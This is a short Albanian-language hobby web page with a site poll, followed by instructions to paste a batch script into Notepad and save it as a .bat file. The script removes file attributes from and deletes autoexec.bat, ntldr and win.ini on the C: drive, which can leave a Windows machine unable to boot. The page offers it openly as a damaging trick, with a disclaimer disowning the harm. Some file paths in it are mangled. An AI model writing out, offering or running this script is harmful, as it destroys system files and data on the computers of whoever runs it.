ωωω.fєяιzαנι-кѕѕ.ραgє.тℓ
  fikja pc pergjithmon
 
Your Poll:
Your Poll:
 
pollcode.com free polls
qyshe po juv doket wep-i
mire shum i mire mesatarisht keq   


 
qyshe po juv doket wep-i
mire
shum i mire
mesatarisht
keq
  
pollcode.com free polls
 


fillimisht ne nuk mbajm pergjegjsi per demet qe mund ti shkaktoni ju.


HAPIM notepadin dhe vendosim ket kod:@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.inie ruajm fajllin me qfar do emri nuk o me rendesi mirpo me prapashtesen .bat

per ta ruajtusi bat file tek rubrika text file document nderrojni ne all files.
 
   
 
This website was created for free with Own-Free-Website.com. Would you also like to have your own website?
Sign up for free